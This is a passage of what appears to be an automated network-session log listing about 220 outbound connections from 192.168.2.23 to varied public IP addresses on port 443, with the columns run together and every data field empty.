                                                11931192.168.2.2348774204.216.255.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11932192.168.2.2354522100.194.70.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11933192.168.2.2357636205.182.245.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11934192.168.2.2339542147.62.165.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11935192.168.2.2348872187.190.46.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11936192.168.2.2344404119.155.248.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11937192.168.2.2353694208.93.118.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11938192.168.2.2353396205.183.4.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11939192.168.2.233363637.46.147.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11940192.168.2.23522024.237.108.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11941192.168.2.2339364148.12.181.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11942192.168.2.233916079.123.159.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11943192.168.2.2334354221.7.207.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11944192.168.2.23415588.19.44.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11945192.168.2.2360188111.187.251.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11946192.168.2.2347498206.70.109.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11947192.168.2.2351882157.47.159.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11948192.168.2.234142614.27.42.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11949192.168.2.234021866.51.185.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11950192.168.2.2334360208.119.90.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11951192.168.2.2352194190.125.53.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11952192.168.2.2348102124.98.181.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11953192.168.2.233900612.138.234.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11954192.168.2.235154041.71.64.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11955192.168.2.23598344.120.136.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11956192.168.2.2358138199.75.35.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11957192.168.2.2347746223.222.243.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11958192.168.2.2333524106.185.18.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11959192.168.2.2349552137.81.91.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11960192.168.2.2332780100.167.246.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11961192.168.2.234834060.203.13.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11962192.168.2.2345290216.238.175.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11963192.168.2.2351900155.161.74.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11964192.168.2.234196047.97.213.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11965192.168.2.2335102167.33.179.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11966192.168.2.2347586129.44.254.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11967192.168.2.2346864183.100.224.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11968192.168.2.2360334176.159.161.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11969192.168.2.235280288.0.69.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11970192.168.2.234106450.99.161.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11971192.168.2.23514425.6.253.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11972192.168.2.2349546197.158.189.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11973192.168.2.2333154164.123.97.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11974192.168.2.235499873.217.253.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11975192.168.2.2353464189.249.63.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11976192.168.2.23389565.51.178.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11977192.168.2.2347496155.42.170.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11978192.168.2.2360180121.164.135.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11979192.168.2.2346990155.1.98.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11980192.168.2.2341306161.215.77.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11981192.168.2.2334924151.188.188.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11982192.168.2.234469646.34.226.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11983192.168.2.235290045.57.34.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11984192.168.2.233489685.231.216.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11985192.168.2.2336574112.214.82.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11986192.168.2.23398308.29.183.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11987192.168.2.2343036203.23.10.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11988192.168.2.23367008.226.66.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11989192.168.2.2350354217.122.60.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11990192.168.2.2350578207.175.214.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11991192.168.2.2338168113.214.47.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11992192.168.2.2358660152.87.114.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11993192.168.2.235148069.212.237.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11994192.168.2.2358134118.134.40.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11995192.168.2.235027220.65.251.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11996192.168.2.2359160177.74.245.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11997192.168.2.2353930129.41.136.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11998192.168.2.235469082.178.139.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11999192.168.2.2340966182.167.172.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12000192.168.2.2333626176.86.212.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12001192.168.2.2350416149.176.240.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12002192.168.2.235856418.84.22.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12003192.168.2.234112473.71.180.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12004192.168.2.233542481.108.181.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12005192.168.2.2354772110.73.195.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12006192.168.2.2335156156.228.117.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12007192.168.2.2346642199.253.146.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12008192.168.2.2355480129.224.4.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12009192.168.2.2354152220.181.123.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12010192.168.2.2356626182.219.208.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12011192.168.2.235199696.162.220.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12012192.168.2.2343652175.174.63.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12013192.168.2.235865059.71.0.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12014192.168.2.2340578204.216.196.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12015192.168.2.2348328180.133.212.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12016192.168.2.2338142155.8.196.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12017192.168.2.234938065.43.147.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12018192.168.2.2349938192.76.206.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12019192.168.2.2346724198.196.58.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12020192.168.2.235528283.130.160.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12021192.168.2.235013057.23.82.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12022192.168.2.2348358197.115.193.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12023192.168.2.2349194112.169.82.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12024192.168.2.234117863.209.116.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12025192.168.2.235294288.57.245.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12026192.168.2.2348898100.243.139.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12027192.168.2.233671844.94.200.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12028192.168.2.233980461.107.193.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12029192.168.2.2338838185.148.74.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12030192.168.2.2335248194.47.64.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12031192.168.2.2342624108.219.190.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12032192.168.2.2355792111.199.251.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12033192.168.2.233411232.174.249.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12034192.168.2.2360330165.148.197.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12035192.168.2.2339100134.96.116.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12036192.168.2.2359416164.103.63.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12037192.168.2.2340450164.172.227.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12038192.168.2.234158871.108.246.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12039192.168.2.2346856122.182.206.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12040192.168.2.2340748189.113.67.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12041192.168.2.2349550192.193.172.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12042192.168.2.235092827.44.39.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12043192.168.2.2354616105.236.237.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12044192.168.2.2350630199.61.170.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12045192.168.2.2348948216.71.203.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12046192.168.2.2341434174.255.226.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12047192.168.2.235400487.150.237.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12048192.168.2.2337638188.13.175.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12049192.168.2.2336100167.32.74.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12050192.168.2.233555675.82.248.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12051192.168.2.2334480134.8.213.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12052192.168.2.2335930197.183.209.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12053192.168.2.234575884.26.82.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12054192.168.2.2343506180.57.81.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12055192.168.2.2350816101.44.6.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12056192.168.2.235089042.120.221.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12057192.168.2.2345836206.182.209.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12058192.168.2.235547077.211.52.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12059192.168.2.2350426164.181.5.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12060192.168.2.2342828179.149.64.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12061192.168.2.234590241.30.76.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12062192.168.2.2336366220.217.156.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12063192.168.2.2343260182.99.162.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12064192.168.2.233980490.30.32.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12065192.168.2.233830862.129.144.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12066192.168.2.2345854194.80.243.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12067192.168.2.2348002135.62.152.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12068192.168.2.2337834103.134.128.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12069192.168.2.2352704153.67.173.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12070192.168.2.233494243.229.160.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12071192.168.2.235334648.4.146.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12072192.168.2.234791688.183.51.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12073192.168.2.234115676.148.249.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12074192.168.2.234076418.95.211.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12075192.168.2.2334620129.198.222.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12076192.168.2.2351742203.104.71.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12077192.168.2.234217836.48.65.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12078192.168.2.2355850136.37.142.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12079192.168.2.2354200193.24.45.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12080192.168.2.2358984207.174.4.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12081192.168.2.235948268.77.147.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12082192.168.2.2343486151.22.147.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12083192.168.2.234410285.198.230.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12084192.168.2.235172638.71.129.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12085192.168.2.2344872145.224.165.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12086192.168.2.234235084.158.13.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12087192.168.2.2355996104.80.64.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12088192.168.2.2342938155.47.125.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12089192.168.2.235506040.7.125.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12090192.168.2.2333408163.250.150.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12091192.168.2.23606961.115.192.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12092192.168.2.235290691.144.37.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12093192.168.2.235462858.32.196.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12094192.168.2.2345276217.11.5.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12095192.168.2.2352868173.69.202.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12096192.168.2.2340550205.136.109.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12097192.168.2.235929248.250.66.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12098192.168.2.235396643.44.45.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12099192.168.2.2346778195.161.6.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12100192.168.2.2333610184.215.42.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12101192.168.2.235772478.108.196.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12102192.168.2.233742452.107.232.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12103192.168.2.235263236.1.176.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12104192.168.2.2356442165.154.73.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12105192.168.2.2337236137.153.208.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12106192.168.2.2356636179.187.24.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12107192.168.2.234758264.207.67.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12108192.168.2.2350244192.189.91.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12109192.168.2.2353626115.45.176.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12110192.168.2.2333332183.116.171.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12111192.168.2.2355110113.172.152.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12112192.168.2.23509968.202.26.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12113192.168.2.2347312171.36.118.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12114192.168.2.2358964207.138.44.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12115192.168.2.2340324177.192.103.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12116192.168.2.2339232141.136.152.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12117192.168.2.2357714137.128.13.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12118192.168.2.2352340217.231.108.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12119192.168.2.233413814.1.68.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12120192.168.2.233634837.209.100.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12121192.168.2.2333738192.40.27.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12122192.168.2.2334396202.211.192.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12123192.168.2.2342896211.239.55.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12124192.168.2.235478042.9.17.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12125192.168.2.234592269.223.241.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12126192.168.2.2337726222.149.234.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12127192.168.2.235069683.105.128.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12128192.168.2.233558694.135.82.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12129192.168.2.2333574174.70.211.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12130192.168.2.2346570199.49.119.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12131192.168.2.2352150140.73.141.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12132192.168.2.2351650148.149.49.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12133192.168.2.2346648143.101.75.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12134192.168.2.235514418.147.60.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12135192.168.2.2344670159.130.17.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12136192.168.2.233789248.192.206.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12137192.168.2.2345792218.61.226.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12138192.168.2.2349626197.240.218.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12139192.168.2.235968078.122.238.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12140192.168.2.2347126180.182.25.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12141192.168.2.2340252114.254.155.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12142192.168.2.2358182179.251.104.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12143192.168.2.2347826138.167.209.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12144192.168.2.2355580134.149.146.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12145192.168.2.2344198223.134.30.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12146192.168.2.2354936159.72.74.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12147192.168.2.2337564151.84.17.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12148192.168.2.2349434178.207.163.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12149192.168.2.2344016131.71.185.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12150192.168.2.233974223.240.77.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12151192.168.2.2342192173.203.231.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12152192.168.2.235455067.96.207.63443
                                                TimestampBytes transferredDirectionData


